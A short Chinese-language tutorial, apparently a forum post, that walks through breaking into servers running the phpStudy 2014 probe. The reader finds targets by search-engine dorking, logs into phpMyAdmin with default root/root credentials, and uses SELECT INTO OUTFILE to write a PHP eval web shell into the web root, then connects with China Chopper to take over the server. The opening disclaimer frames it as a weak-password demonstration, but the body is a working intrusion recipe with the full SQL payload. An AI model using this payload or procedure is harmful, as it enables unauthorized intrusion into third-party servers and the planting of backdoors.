聲明:
本教程僅僅是演示管理員安全意識不強,存在弱口令情況.網站被非法入侵的演示,請勿用於惡意用途!
-
今天看到論壇有人發布了一個通過這phpStudy 探針 關鍵字搜索檢索提權網址服務器,這個挺簡單的.記錄一下吧。
-
搜索引擎KeyWord:
phpStudy 探針 2014
-
多往后翻翻。翻個幾十頁最好。
-
點開搜索到的內容。
點開搜索到的內容。
翻到最下面,嘗試連接mysql數據庫是否正常(賬號密碼默認為:root):
1、 如果提示正常。請在網頁后面加上 ‘phpmyadmin’,如 http://www.baidu.com/phpmyadmin
2、 然后回車即可。
3、 出現以下界面;默認賬號密碼嘗試登陸;
4、 登陸成功后,第一步找到左邊導航欄的MYSQL,然后點擊上面的SQL,如圖
5、 (點擊mysql后,右側表單會增加很多內容,不要理會他,直接點表單上方的SQL按鈕即可。)
6、 下面往SQL寫入一句話木馬,然后用菜刀連接即可!
1、 圖片效果不好,貼出代碼,自行對比一下子- -
2、 Code:
mysq1
sql 語句
Drop TABLE IF EXISTS 菜刀連接密碼; Create TABLE 自定義一個表名(cmd text NOT NULL); Insert INTO 自定義一個表名 (cmd) VALUES('<?php @eval($_POST[菜刀連接密碼])?>'); Select cmd from 自己編寫 into outfile 'D:/WWW/菜刀連接地址.php';['左邊絕對地址需要根據網頁自行更改'] Drop TABLE IF EXISTS 用戶和密碼;- 1
- 2
- 3
- 4
- 5
- 6
- 7
7、 添加完成后,使用菜刀連接;
后面tmp.php是在寫入SQL一句話木馬那自定義設置的。
成功連上!可自行提權服務器等操作!